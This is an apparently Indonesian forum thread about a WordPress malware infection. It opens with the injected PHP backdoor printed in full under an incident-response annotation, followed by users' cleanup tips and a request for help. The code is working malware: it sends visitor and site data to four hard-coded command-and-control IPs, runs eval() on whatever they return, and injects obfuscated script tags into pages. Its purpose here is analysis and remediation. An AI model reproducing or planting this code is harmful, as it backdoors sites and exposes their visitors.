It's this script again :/
/*
 * Injected WordPress malware, pasted as found (one collapsed line; the string that
 * starts at the end of the first line continues on the second). Annotated for
 * incident response: what each piece does and what to search for when cleaning a site.
 *
 * opanki($buf): output-buffer callback registered with ob_start("opanki"). It counts
 *   "href" and "<?xml" occurrences in the lowercased page and, when the page has more
 *   than two links and no "<?xml" (an ordinary HTML page rather than a feed/sitemap),
 *   prepends $_SERVER["good"] to the response. The injected payload therefore shows up
 *   at the very top of rendered HTML pages only, which is why it is easy to miss in
 *   feeds or in the files themselves.
 *
 * GetMama(): returns the hard-coded string "www.pocitac.com", sent as the "mother"
 *   parameter of the beacon below.
 *
 * ahfudflfzdhfhs($pa): beacons to http://<$pa>/opp.php with this file's path (__FILE__),
 *   the request host, client IP, referer and user agent (curl with a 3 s timeout, else
 *   @file_get_contents). If the response contains "eval", that word is stripped and the
 *   remainder is passed to eval() — a remote code-execution backdoor controlled by
 *   whoever answers on those hosts. If it contains "ebna", the remainder becomes the
 *   content opanki injects. The `$_SERVER["good"] = $god_mode;` after `return true;`
 *   is unreachable; the effective assignment is the last statement of the script.
 *
 * $father[]: the four command-and-control addresses tried in order until one answers.
 *
 * Fallback: when no host answered ($show === false), $god_mode becomes the obfuscated
 *   <script> below. Its hex-escaped array decodes to the same four IPs plus "script",
 *   "createElement", "src", "http://", "/s.php", "head", "getElementsByTagName" and
 *   "appendChild": for each IP it appends <script src="http://<ip>/s.php"> to <head>.
 *
 * Indicators to search for across the whole install (files and database): the names
 * opanki, GetMama, ahfudflfzdhfhs; ob_start("opanki"); $_SERVER["good"]; the string
 * www.pocitac.com; the paths /opp.php and /s.php; and the IPs 146.185.254.245,
 * 31.184.242.103, 91.196.216.148, 91.196.216.49. Because the payload is fetched at
 * request time, the served page can change without any file changing; blocking these
 * addresses at egress removes the remote payload but not the backdoor, so the fragment
 * itself must be removed from every file it was appended to.
 */
if (!function_exists(GetMama)){function opanki($buf){$god_mode = $_SERVER["good"]; str_replace("href","href",strtolower($buf),$cnt_h); str_replace("<?xml","<?xml",strtolower($buf),$cnt_x); if (($cnt_h > 2)&&($cnt_x == 0)) {$buf = $god_mode . $buf;} return $buf; } function GetMama(){$mother = "www.pocitac.com";return $mother;}ob_start("opanki");$show = false;function ahfudflfzdhfhs($pa){global $show; global $god_mode; $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;if( function_exists("curl_init") ){$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = curl_exec($ch);} else {$ult = @file_get_contents($url);} if (strpos($ult,"eval") !== false){$z = str_replace("eval","",$ult); eval($z); $show = true; return true;} if (strpos($ult,"ebna") !== false){$z = str_replace("ebna","",$ult); $god_mode = $z; $show = true; return true; $_SERVER["good"] = $god_mode; } else {return false;}}$father[] = "146.185.254.245";$father[] = "31.184.242.103";$father[] = "91.196.216.148";$father[] = "91.196.216.49";foreach($father as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}if ($show === false){$script='<script>var 
_0x8ab7=["\x31\x34\x36\x2E\x31\x38\x35\x2E\x32\x35\x34\x2E\x32\x34\x35","\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x31\x34\x38","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x34\x39","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F","\x2F\x73\x2E\x70\x68\x70","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>'; $god_mode = $script;} $_SERVER["good"] = $god_mode; }
Coba di restore dulu aja sob make backup-an sebelum kena ini malware
baru beres recover ane gan,,
itu si eval base 64 biasanya ada di function.php (atau sejenisnya) jadi itu diembed di file function buat di load di header,,
lalu buka wp-content di situ ada 2 file php aneh,, selain index.php
hapus 2-2nya
lalu di wp-config.php
file agan akan ada 4000 baris,, hapus setelah wp setting ke bawah,,
semoga membantu
lalu hardening server anda 😀
yans
Apakah musti di restore terlebih dahulu?
Saya sudah coba hapus scriptnya di file config.php, tapi tetap tidak bisa.
ada solusi lain??
Saya memiliki beberapa amazon mini site yang terserang malware. Salah satunya adalah : http://nikoncoolpixs930016mp.com. Saking parahnya, mbah google selalu memperingatkan jika mengunjungi URL tersebut. Mereka diblok oleh google sehingga wp-adminnya pun tidak bisa dibuka. Satu-satunya yang masih bisa saya buka hanya idrusBlog.com. Masih adakah cara memperbaiki mini site tersebut?
Mohon supportnya dan bantuannya teman-teman.
Terima kasih
Idrus.